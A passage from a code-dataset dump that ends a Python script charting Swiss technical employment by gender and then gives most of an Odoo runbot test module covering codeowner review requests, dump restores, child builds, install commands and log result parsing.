extractFormatDataFromExcel(\"./data/profession_stats.xlsx\", \"Total\")\n female_df = extractFormatDataFromExcel(\"./data/profession_stats.xlsx\", \"Female\")\n male_df = extractFormatDataFromExcel(\"./data/profession_stats.xlsx\", \"Male\")\n\n # Dataframe with total number of people in tech and split by gender\n # Tech career indices: 62-63, 71, 72\n # Unfortunately 74 is combined with 73 & 75, so ignore this\n totals_df = pd.DataFrame({\"Total\": total_df[\"62-63\"] + total_df[\"71\"] + total_df[\"72\"] + total_df[\"73-75\"], \n \"Female\": female_df[\"62-63\"] + female_df[\"71\"] + female_df[\"72\"] + female_df[\"73-75\"], \n \"Male\": male_df[\"62-63\"] + male_df[\"71\"] + male_df[\"72\"] + male_df[\"73-75\"]})\n\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=totals_df.index, y=totals_df.Total, mode=None, fill='tozeroy', line=dict(color='rgb(126, 82, 160)'), name=\"Total\")) # Purple color with 0.5 translucency\n fig.add_trace(go.Scatter(x=totals_df.index, y=totals_df.Female, mode='lines', fill='tozeroy', line=dict(color='rgb(17, 29, 74)', width=4), name=\"Women\")) # Green-blue color and thicker line\n fig.update_layout(\n title_text='Employees in Technical Roles in Switzerland (1991-2023)',\n title_font=dict(size=32), # Change the font size of the title\n legend=dict(x=0.02, y=1, font=dict(size=24)), # Move the legend to the top left corner and change its size\n annotations=[\n dict(\n x=1,\n y=-0.12,\n showarrow=False,\n text=\"Data source: https://www.bfs.admin.ch/bfs/de/home/statistiken/kataloge-datenbanken.assetdetail.27165007.html\",\n xref=\"paper\",\n yref=\"paper\",\n font=dict(size=14)\n )\n ]\n )\n fig.update_xaxes(tickfont=dict(size=22)) # Change the font size of the x axis labels\n fig.update_yaxes(tickfont=dict(size=22)) # Change the font size of the y axis labels\n fig.show()\n # pio.write_image(fig, 'images/tech_employees.png')\n\n # Stats for presentation\n perc_women_in_tech = int(round(totals_df[\"Female\"][-1]/totals_df[\"Total\"][-1] * 100))\n print(f\"As of June 2023 there are {perc_women_in_tech}% of tech jobs are filled by women, with {int(round(totals_df.Total[-1]))} total tech jobs in Switzerland.\")\n","repo_name":"alexrollings/women_plusplus","sub_path":"data_generation/profession_stats.py","file_name":"profession_stats.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5665415057","text":"# -*- coding: utf-8 -*-\nfrom unittest.mock import patch, mock_open\nfrom odoo import Command\nfrom odoo.tools import mute_logger\nfrom odoo.exceptions import UserError\nfrom odoo.addons.runbot.common import RunbotException\nfrom .common import RunbotCase\n\nclass TestBuildConfigStepCommon(RunbotCase):\n def setUp(self):\n super().setUp()\n\n self.Build = self.env['runbot.build']\n self.ConfigStep = self.env['runbot.build.config.step']\n self.Config = self.env['runbot.build.config']\n\n self.server_commit = self.Commit.create({\n 'name': 'dfdfcfcf',\n 'repo_id': self.repo_server.id\n })\n self.parent_build = self.Build.create({\n 'params_id': self.base_params.copy({'commit_link_ids': [(0, 0, {'commit_id': self.server_commit.id})]}).id,\n 'local_result': 'ok',\n })\n self.start_patcher('find_patcher', 'odoo.addons.runbot.common.find', 0)\n self.start_patcher('findall_patcher', 'odoo.addons.runbot.models.build.BuildResult._parse_config', {})\n\n\nclass TestCodeowner(TestBuildConfigStepCommon):\n def setUp(self):\n super().setUp()\n self.config_step = self.ConfigStep.create({\n 'name': 'test_codeowner',\n 'job_type': 'codeowner',\n 'fallback_reviewer': 'codeowner-team',\n })\n self.child_config = self.Config.create({'name': 'test_config'})\n self.config_step.create_config_ids = [self.child_config.id]\n self.team1 = self.env['runbot.team'].create({'name': \"Team1\", 'github_team': \"team_01\"})\n self.team2 = self.env['runbot.team'].create({'name': \"Team2\", 'github_team': \"team_02\"})\n self.env['runbot.codeowner'].create({'github_teams': 'team_py', 'project_id': self.project.id, 'regex': '.*.py'})\n self.env['runbot.codeowner'].create({'github_teams': 'team_js', 'project_id': self.project.id, 'regex': '.*.js'})\n self.server_commit.name = 'dfdfcfcf'\n\n def test_codeowner_is_base(self):\n self.dev_bundle.is_base = True\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n 'Skipping base bundle',\n ])\n self.assertEqual(self.parent_build.local_result, 'ok')\n\n def test_codeowner_check_limits(self):\n self.parent_build.params_id.commit_link_ids[0].file_changed = 451\n self.parent_build.params_id.commit_link_ids[0].base_ahead = 51\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n 'Limit reached: dfdfcfcf has more than 50 commit (51) and will be skipped. Contact runbot team to increase your limit if it was intended',\n 'Limit reached: dfdfcfcf has more than 450 modified files (451) and will be skipped. Contact runbot team to increase your limit if it was intended',\n ])\n self.assertEqual(self.parent_build.local_result, 'ko')\n\n def test_codeowner_draft(self):\n self.dev_pr.draft = True\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n 'Some pr are draft, skipping: 1234'\n ])\n self.assertEqual(self.parent_build.local_result, 'warn')\n\n def test_codeowner_draft_closed(self):\n self.dev_pr.draft = True\n self.dev_pr.alive = False\n self.assertEqual(self.parent_build.local_result, 'ok')\n\n def test_codeowner_forwardpot(self):\n self.dev_pr.pr_author = 'fw-bot'\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n 'Ignoring forward port pull request: 1234'\n ])\n self.assertEqual(self.parent_build.local_result, 'ok')\n\n def test_codeowner_invalid_target(self):\n self.dev_pr.target_branch_name = 'master-other-dev-branch'\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n 'Some pr have an invalid target: 1234'\n ])\n self.assertEqual(self.parent_build.local_result, 'ko')\n\n def test_codeowner_pr_duplicate(self):\n second_pr = self.Branch.create({\n 'name': '1235',\n 'is_pr': True,\n 'remote_id': self.remote_server.id,\n 'target_branch_name': self.dev_bundle.base_id.name,\n 'pull_head_remote_id': self.remote_server.id,\n })\n second_pr.pull_head_name = f'{self.remote_server.owner}:{self.dev_branch.name}'\n second_pr.bundle_id = self.dev_bundle.id\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n \"More than one open pr in this bundle for server: ['1234', '1235']\"\n ])\n self.assertEqual(self.parent_build.local_result, 'ko')\n\n def test_get_module(self):\n self.assertEqual(self.repo_server.addons_paths, 'addons,core/addons')\n self.assertEqual('module1', self.repo_server._get_module('server/core/addons/module1/some/file.py'))\n self.assertEqual('module1', self.repo_server._get_module('server/addons/module1/some/file.py'))\n self.assertEqual('module_addons', self.repo_addons._get_module('addons/module_addons/some/file.py'))\n self.assertEqual(None, self.repo_server._get_module('server/core/module1/some/file.py'))\n self.assertEqual(None, self.repo_server._get_module('server/core/module/some/file.py'))\n\n def test_codeowner_regex_multiple(self):\n self.diff = 'file.js\\nfile.py\\nfile.xml'\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(messages[1], 'Checking 2 codeowner regexed on 3 files')\n self.assertEqual(messages[2], 'Adding team_js to reviewers for file [server/file.js](https://False/blob/dfdfcfcf/file.js)')\n self.assertEqual(messages[3], 'Adding team_py to reviewers for file [server/file.py](https://False/blob/dfdfcfcf/file.py)')\n self.assertEqual(messages[4], 'Adding codeowner-team to reviewers for file [server/file.xml](https://False/blob/dfdfcfcf/file.xml)')\n self.assertEqual(messages[5], 'Requesting review for pull request [base/server:1234](https://example.com/base/server/pull/1234): codeowner-team, team_js, team_py')\n self.assertEqual(self.dev_pr.reviewers, 'codeowner-team,team_js,team_py')\n\n def test_codeowner_regex_some_already_on(self):\n self.diff = 'file.js\\nfile.py\\nfile.xml'\n self.dev_pr.reviewers = 'codeowner-team,team_js'\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message') \n self.assertEqual(messages[5], 'Requesting review for pull request [base/server:1234](https://example.com/base/server/pull/1234): team_py')\n\n def test_codeowner_regex_all_already_on(self):\n self.diff = 'file.js\\nfile.py\\nfile.xml'\n self.dev_pr.reviewers = 'codeowner-team,team_js,team_py'\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message') \n self.assertEqual(messages[5], 'All reviewers are already on pull request [base/server:1234](https://example.com/base/server/pull/1234)')\n\n def test_codeowner_author_in_team(self):\n self.diff = 'file.js\\nfile.py\\nfile.xml'\n self.team1.github_team = 'team_py'\n self.team1.github_logins = 'some_member,another_member'\n self.team1.skip_team_pr = True\n self.dev_pr.pr_author = 'some_member'\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(messages[5], \"Skipping teams ['team_py'] since author is part of the team members\")\n self.assertEqual(messages[6], 'Requesting review for pull request [base/server:1234](https://example.com/base/server/pull/1234): codeowner-team, team_js')\n self.assertEqual(self.dev_pr.reviewers, 'codeowner-team,team_js,team_py')\n\n def test_codeowner_ownership_base(self):\n module1 = self.env['runbot.module'].create({'name': \"module1\"})\n self.env['runbot.module.ownership'].create({'team_id': self.team1.id, 'module_id': module1.id})\n self.diff = '\\n'.join([\n 'core/addons/module1/some/file.py',\n ])\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(\n messages[2], \n 'Adding team_01, team_py to reviewers for file [server/core/addons/module1/some/file.py](https://False/blob/dfdfcfcf/core/addons/module1/some/file.py)'\n )\n\n def test_codeowner_ownership_fallback(self):\n module1 = self.env['runbot.module'].create({'name': \"module1\"})\n self.env['runbot.module.ownership'].create({'team_id': self.team1.id, 'module_id': module1.id, 'is_fallback': True})\n self.diff = '\\n'.join([\n 'core/addons/module1/some/file.py',\n ])\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(\n messages[2], \n 'Adding team_py to reviewers for file [server/core/addons/module1/some/file.py](https://False/blob/dfdfcfcf/core/addons/module1/some/file.py)'\n )\n\n def test_codeowner_ownership(self):\n module1 = self.env['runbot.module'].create({'name': \"module1\"})\n module2 = self.env['runbot.module'].create({'name': \"module2\"})\n self.env['runbot.module.ownership'].create({'team_id': self.team1.id, 'module_id': module1.id})\n self.env['runbot.module.ownership'].create({'team_id': self.team2.id, 'module_id': module2.id})\n self.diff = '\\n'.join([\n 'core/addons/module1/some/file.py',\n 'core/addons/module2/some/file.ext',\n 'core/addons/module3/some/file.js',\n 'core/addons/module4/some/file.txt',\n ])\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(messages, [\n 'PR [base/server:1234](https://example.com/base/server/pull/1234) found for repo **server**',\n 'Checking 2 codeowner regexed on 4 files',\n 'Adding team_01, team_py to reviewers for file [server/core/addons/module1/some/file.py](https://False/blob/dfdfcfcf/core/addons/module1/some/file.py)',\n 'Adding team_02 to reviewers for file [server/core/addons/module2/some/file.ext](https://False/blob/dfdfcfcf/core/addons/module2/some/file.ext)',\n 'Adding team_js to reviewers for file [server/core/addons/module3/some/file.js](https://False/blob/dfdfcfcf/core/addons/module3/some/file.js)',\n 'Adding codeowner-team to reviewers for file [server/core/addons/module4/some/file.txt](https://False/blob/dfdfcfcf/core/addons/module4/some/file.txt)',\n 'Requesting review for pull request [base/server:1234](https://example.com/base/server/pull/1234): codeowner-team, team_01, team_02, team_js, team_py'\n ])\n\nclass TestBuildConfigStepRestore(TestBuildConfigStepCommon):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.restore_config_step = cls.env['runbot.build.config.step'].create({\n 'name': 'restore',\n 'job_type': 'restore',\n })\n cls.restore_config = cls.env['runbot.build.config'].create({\n 'name': 'Restore',\n 'step_order_ids': [\n (0, 0, {'sequence': 10, 'step_id': cls.restore_config_step.id}),\n ],\n })\n\n def test_restore(self):\n # setup master branch\n master_batch = self.master_bundle._force()\n with mute_logger('odoo.addons.runbot.models.batch'):\n master_batch._prepare()\n reference_slot = master_batch.slot_ids\n trigger = reference_slot.trigger_id\n self.assertEqual(trigger.name, 'Server trigger', 'Just checking that we have a single slot')\n reference_build = reference_slot.build_id\n self.env['runbot.database'].create({\n 'build_id': reference_build.id,\n 'name': f'{reference_build.dest}-suffix',\n })\n reference_build.local_state = 'done'\n reference_build.local_result = 'ok'\n\n # custom trigger\n config_data = {\n 'dump_trigger_id': trigger.id,\n 'dump_suffix': 'suffix',\n }\n self.env['runbot.bundle.trigger.custom'].create({\n 'bundle_id': self.dev_bundle.id,\n 'config_id': self.restore_config.id,\n 'trigger_id': trigger.id,\n 'config_data': config_data,\n })\n\n # create dev build\n dev_batch = self.dev_bundle._force()\n with mute_logger('odoo.addons.runbot.models.batch'):\n dev_batch._prepare()\n dev_batch.base_reference_batch_id = master_batch # not tested, this is not the purpose of this test\n dev_build = dev_batch.slot_ids.build_id\n self.assertEqual(dev_build.params_id.config_data, config_data)\n\n docker_params = self.restore_config_step._run_restore(dev_build)\n cmds = docker_params['cmd'].split(' && ')\n self.assertEqual(f'wget https://False/runbot/static/build/{reference_build.dest}/logs/{reference_build.dest}-suffix.zip', cmds[2])\n self.assertEqual(f'psql -q {dev_build.dest}-suffix < dump.sql', cmds[8])\n self.called=True\n\n\n\nclass TestBuildConfigStepCreate(TestBuildConfigStepCommon):\n\n def setUp(self):\n super().setUp()\n self.config_step = self.ConfigStep.create({\n 'name': 'test_step',\n 'job_type': 'create_build',\n 'number_builds': 2,\n })\n self.child_config = self.Config.create({'name': 'test_config'})\n self.config_step.create_config_ids = [self.child_config.id]\n\n def test_config_step_create_results(self):\n \"\"\" Test child builds are taken into account\"\"\"\n\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 2, 'Two sub-builds should have been generated')\n\n # check that the result will be ignored by parent build\n for child_build in self.parent_build.children_ids:\n self.assertFalse(child_build.orphan_result)\n child_build.local_result = 'ko'\n self.assertEqual(child_build.global_result, 'ko')\n\n\n self.assertEqual(self.parent_build.global_result, 'ko')\n\n def test_config_step_create(self):\n \"\"\" Test the config step of type create \"\"\"\n self.config_step.make_orphan = True\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 2, 'Two sub-builds should have been generated')\n\n # check that the result will be ignored by parent build\n for child_build in self.parent_build.children_ids:\n self.assertTrue(child_build.orphan_result, 'An orphan result config step should mark the build as orphan_result')\n child_build.local_result = 'ko'\n # child_build._update_:globals()\n\n self.assertEqual(self.parent_build.global_result, 'ok')\n\n def test_config_step_create_child_data(self):\n \"\"\" Test the config step of type create \"\"\"\n self.config_step.number_builds = 5\n json_config = {'child_data': [{'extra_params': '-i m1'}, {'extra_params': '-i m2'}]}\n self.parent_build = self.Build.create({\n 'params_id': self.base_params.create({\n 'version_id': self.version_13.id,\n 'project_id': self.project.id,\n 'config_id': self.default_config.id,\n 'config_data': json_config,\n }).id,\n })\n\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 10, '10 build should have been generated')\n\n # check that the result will be ignored by parent build\n for child_build in self.parent_build.children_ids:\n self.assertTrue(child_build.config_id, self.child_config)\n\n def test_config_step_create_child_data_unique(self):\n \"\"\" Test the config step of type create \"\"\"\n json_config = {'child_data': {'extra_params': '-i m1'}, 'number_build': 5}\n self.parent_build = self.Build.create({\n 'params_id': self.base_params.create({\n 'version_id': self.version_13.id,\n 'project_id': self.project.id,\n 'config_id': self.default_config.id,\n 'config_data': json_config,\n }).id,\n })\n\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 5, '5 build should have been generated')\n\n # check that the result will be ignored by parent build\n for child_build in self.parent_build.children_ids:\n self.assertTrue(child_build.config_id, self.child_config)\n\n def test_config_step_create_child_data_with_config(self):\n \"\"\" Test the config step of type create \"\"\"\n\n test_config_1 = self.Config.create({'name': 'test_config1'})\n test_config_2 = self.Config.create({'name': 'test_config2'})\n\n self.config_step.number_builds = 5\n json_config = {'child_data': [{'extra_params': '-i m1', 'config_id': test_config_1.id}, {'config_id': test_config_2.id}]}\n self.parent_build = self.Build.create({\n 'params_id': self.base_params.create({\n 'version_id': self.version_13.id,\n 'project_id': self.project.id,\n 'config_id': self.default_config.id,\n 'config_data': json_config,\n }).id,\n })\n\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 10, '10 build should have been generated')\n self.assertEqual(len(self.parent_build.children_ids.filtered(lambda b: b.config_id == test_config_1)), 5)\n self.assertEqual(len(self.parent_build.children_ids.filtered(lambda b: b.config_id == test_config_2)), 5)\n\n\n\n\nclass TestBuildConfigStep(TestBuildConfigStepCommon):\n\n def test_config_step_raises(self):\n \"\"\" Test a config raises when run step position is wrong\"\"\"\n\n run_step = self.ConfigStep.create({\n 'name': 'run_step',\n 'job_type': 'run_odoo',\n })\n\n create_step = self.ConfigStep.create({\n 'name': 'test_step',\n 'job_type': 'create_build',\n })\n\n config = self.Config.create({'name': 'test_config'})\n\n # test that the run_odoo step has to be the last one\n with self.assertRaises(UserError):\n config.write({\n 'step_order_ids': [\n (0, 0, {'sequence': 10, 'step_id': run_step.id}),\n (0, 0, {'sequence': 15, 'step_id': create_step.id}),\n ]\n })\n\n # test that the run_odoo step should be preceded by an install step\n with self.assertRaises(UserError):\n config.write({\n 'step_order_ids': [\n (0, 0, {'sequence': 15, 'step_id': run_step.id}),\n (0, 0, {'sequence': 10, 'step_id': create_step.id}),\n ]\n })\n\n def test_config_step_copy(self):\n \"\"\" Test a config copy with step_order_ids \"\"\"\n\n install_step = self.ConfigStep.create({\n 'name': 'install_step',\n 'job_type': 'install_odoo'\n })\n\n run_step = self.ConfigStep.create({\n 'name': 'run_step',\n 'job_type': 'run_odoo',\n })\n\n create_step = self.ConfigStep.create({\n 'name': 'test_step',\n 'job_type': 'create_build',\n })\n\n config = self.Config.create({'name': 'test_config'})\n StepOrder = self.env['runbot.build.config.step.order']\n # Creation order is impoortant to reproduce the Odoo copy bug/feature :-)\n StepOrder.create({'sequence': 15, 'step_id': run_step.id, 'config_id': config.id})\n StepOrder.create({'sequence': 10, 'step_id': create_step.id, 'config_id': config.id})\n StepOrder.create({'sequence': 12, 'step_id': install_step.id, 'config_id': config.id})\n\n dup_config = config.copy()\n self.assertEqual(dup_config.step_order_ids.mapped('step_id'), config.step_order_ids.mapped('step_id'))\n\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_coverage(self, mock_checkout):\n\n config_step = self.ConfigStep.create({\n 'name': 'coverage',\n 'job_type': 'install_odoo',\n 'coverage': True\n })\n\n def docker_run(cmd, log_path, *args, **kwargs):\n self.assertEqual(cmd.pres, [['sudo', 'pip3', 'install', '-r', 'server/requirements.txt']])\n self.assertEqual(cmd.cmd[:10], ['python3', '-m', 'coverage', 'run', '--branch', '--source', '/data/build', '--omit', '*__manifest__.py', 'server/server.py'])\n self.assertIn(['python3', '-m', 'coverage', 'html', '-d', '/data/build/coverage', '--ignore-errors'], cmd.posts)\n self.assertIn(['python3', '-m', 'coverage', 'xml', '-o', '/data/build/logs/coverage.xml', '--ignore-errors'], cmd.posts)\n self.assertEqual(log_path, 'dev/null/logpath')\n\n self.patchers['docker_run'].side_effect = docker_run\n config_step._run_install_odoo(self.parent_build)\n\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_dump(self, mock_checkout):\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'install_odoo',\n })\n\n def docker_run(cmd, log_path, *args, **kwargs):\n dest = self.parent_build.dest\n self.assertEqual(cmd.cmd[:2], ['python3', 'server/server.py'])\n self.assertEqual(cmd.finals[0], ['pg_dump', '%s-all' % dest, '>', '/data/build/logs/%s-all//dump.sql' % dest])\n self.assertEqual(cmd.finals[1], ['cp', '-r', '/data/build/datadir/filestore/%s-all' % dest, '/data/build/logs/%s-all//filestore/' % dest])\n self.assertEqual(cmd.finals[2], ['cd', '/data/build/logs/%s-all/' % dest, '&&', 'zip', '-rmq9', '/data/build/logs/%s-all.zip' % dest, '*'])\n self.assertEqual(log_path, 'dev/null/logpath')\n\n self.patchers['docker_run'].side_effect = docker_run\n\n config_step._run_install_odoo(self.parent_build)\n\n def get_test_tags(self, params):\n cmds = params['cmd'].build().split(' && ')\n self.assertEqual(cmds[1].split(' server/server.py')[0], 'python3')\n return cmds[1].split('--test-tags ')[1].split(' ')[0]\n\n @patch('odoo.addons.runbot.models.build.BuildResult._parse_config')\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_install_tags(self, mock_checkout, parse_config):\n parse_config.return_value = {'--test-enable', '--test-tags'}\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'install_odoo',\n 'enable_auto_tags': False,\n 'test_tags': '/module,:class.method',\n })\n self.env['runbot.build.error'].create({\n 'content': 'foo',\n 'random': True,\n 'test_tags': ':otherclass.othertest'\n })\n params = config_step._run_install_odoo(self.parent_build)\n tags = self.get_test_tags(params)\n self.assertEqual(tags, '/module,:class.method')\n\n config_step.enable_auto_tags = True\n params = config_step._run_install_odoo(self.parent_build)\n tags = self.get_test_tags(params)\n self.assertEqual(tags, '/module,:class.method,-:otherclass.othertest')\n\n @patch('odoo.addons.runbot.models.build.BuildResult._parse_config')\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_install_custom_tags(self, mock_checkout, parse_config):\n parse_config.return_value = {'--test-enable', '--test-tags'}\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'install_odoo',\n 'enable_auto_tags': True,\n })\n self.env['runbot.build.error'].create({\n 'content': 'foo',\n 'random': True,\n 'test_tags': ':otherclass.othertest'\n })\n\n child = self.parent_build._add_child({'config_data': {'test_tags': '-at_install,/module1,/module2'}})\n\n params = config_step._run_install_odoo(child)\n tags = self.get_test_tags(params)\n self.assertEqual(tags, '-at_install,/module1,/module2,-:otherclass.othertest')\n\n\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_db_name(self, mock_checkout):\n config_step = self.ConfigStep.create({\n 'name': 'default',\n 'job_type': 'install_odoo',\n 'custom_db_name': 'custom',\n })\n call_count = 0\n assert_db_name = 'custom'\n\n def docker_run(cmd, log_path, *args, **kwargs):\n db_sufgfix = cmd.cmd[cmd.index('-d')+1].split('-')[-1]\n self.assertEqual(db_sufgfix, assert_db_name)\n nonlocal call_count\n call_count += 1\n\n self.patchers['docker_run'].side_effect = docker_run\n\n config_step._run_step(self.parent_build)()\n\n assert_db_name = 'custom_build'\n parent_build_params = self.parent_build.params_id.copy({'config_data': {'db_name': 'custom_build'}})\n parent_build = self.parent_build.copy({'params_id': parent_build_params.id})\n config_step._run_step(parent_build)()\n\n config_step = self.ConfigStep.create({\n 'name': 'run_test',\n 'job_type': 'run_odoo',\n 'custom_db_name': 'custom',\n })\n config_step._run_step(parent_build)()\n\n self.assertEqual(call_count, 3)\n\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_run_python(self, mock_checkout):\n \"\"\"minimal test for python steps. Also test that `-d` in cmd creates a database\"\"\"\n test_code = \"\"\"cmd = build._cmd()\ncmd += ['-d', 'test_database']\ndocker_params = dict(cmd=cmd)\n \"\"\"\n config_step = self.ConfigStep.create({\n 'name': 'default',\n 'job_type': 'python',\n 'python_code': test_code,\n })\n\n def docker_run(cmd, *args, **kwargs):\n run_cmd = cmd.build()\n self.assertIn('-d test_database', run_cmd)\n\n self.patchers['docker_run'].side_effect = docker_run\n config_step._run_step(self.parent_build)()\n self.patchers['docker_run'].assert_called_once()\n db = self.env['runbot.database'].search([('name', '=', 'test_database')])\n self.assertEqual(db.build_id, self.parent_build)\n\n def test_run_python_run(self):\n \"\"\"minimal test for python steps. Also test that `-d` in cmd creates a database\"\"\"\n test_code = \"\"\"\ndef run():\n return {'a': 'b'}\n\"\"\"\n config_step = self.ConfigStep.create({\n 'name': 'default',\n 'job_type': 'python',\n 'python_code': test_code,\n })\n\n retult = config_step._run_python(self.parent_build)\n self.assertEqual(retult, {'a': 'b'})\n\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_sub_command(self, mock_checkout):\n config_step = self.ConfigStep.create({\n 'name': 'default',\n 'job_type': 'install_odoo',\n 'sub_command': 'subcommand',\n })\n call_count = 0\n\n def docker_run(cmd, log_path, *args, **kwargs):\n nonlocal call_count\n sub_command = cmd.cmd[cmd.index('server/server.py')+1]\n self.assertEqual(sub_command, 'subcommand')\n call_count += 1\n\n self.patchers['docker_run'].side_effect = docker_run\n config_step._run_step(self.parent_build)()\n\n self.assertEqual(call_count, 1)\n\n\nclass TestMakeResult(RunbotCase):\n\n def setUp(self):\n super(TestMakeResult, self).setUp()\n self.ConfigStep = self.env['runbot.build.config.step']\n self.Config = self.env['runbot.build.config']\n\n @patch('odoo.addons.runbot.models.build_config.os.path.getmtime')\n @patch('odoo.addons.runbot.models.build.BuildResult._log')\n def test_make_result(self, mock_log, mock_getmtime):\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\nInitiating shutdown\n\"\"\"\n logs = []\n\n def _log(func, message, level='INFO', log_type='runbot', path='runbot'):\n logs.append((level, message))\n\n mock_log.side_effect = _log\n mock_getmtime.return_value = 7200\n\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'install_odoo',\n 'test_tags': '/module,:class.method',\n })\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(logs, [('INFO', 'Getting results for build %s' % build.dest)])\n self.assertEqual(build.local_result, 'ok')\n # no shutdown\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\n \"\"\"\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'ko')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('ERROR', 'No \"Initiating shutdown\" found in logs, maybe because of cpu limit.')\n ])\n # no loaded\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\n\"\"\"\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'ko')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('ERROR', 'Modules loaded not found in logs')\n ])\n\n # traceback\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\n2019-12-17 17:34:37,692 17 ERROR dbname path.to.test: FAIL: TestClass.test_\nTraceback (most recent call last):\nFile \"x.py\", line a, in test_\n ....\nInitiating shutdown\n\"\"\"\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'ko')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('ERROR', 'Error or traceback found in logs')\n ])\n\n # warning in logs\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\n2019-12-17 17:34:37,692 17 WARNING dbname path.to.test: timeout exceded\nInitiating shutdown\n\"\"\"\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'warn')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('WARNING', 'Warning found in logs')\n ])\n\n # no log file\n logs = []\n self.patchers['isfile'].return_value = False\n config_step._make_results(build)\n\n self.assertEqual(build.local_result, 'ko')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('ERROR', 'Log file not found at the end of test job')\n ])\n\n # no error but build was already in warn\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\nInitiating shutdown\n\"\"\"\n self.patchers['isfile'].return_value = True\n build.local_result = 'warn'\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest)\n ])\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'warn')\n\n @patch('odoo.addons.runbot.models.build_config.ConfigStep._make_tests_results')\n def test_make_python_result(self, mock_make_tests_results):\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'python',\n 'test_tags': '/module,:class.method',\n 'python_result_code': \"\"\"a = 2*5\\nreturn_value = {'local_result': 'ok'}\"\"\"\n })\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n build.local_state = 'testing'\n self.patchers['isfile'].return_value = False\n config_step._make_results(build)\n self.assertEqual(build.local_result, 'ok')\n\n # invalid result code (no return_value set)\n config_step.python_result_code = \"\"\"a = 2*5\\nr = {'a': 'ok'}\\nreturn_value = 'ko'\"\"\"\n with self.assertRaises(RunbotException):\n config_step._make_results(build)\n\n # no result 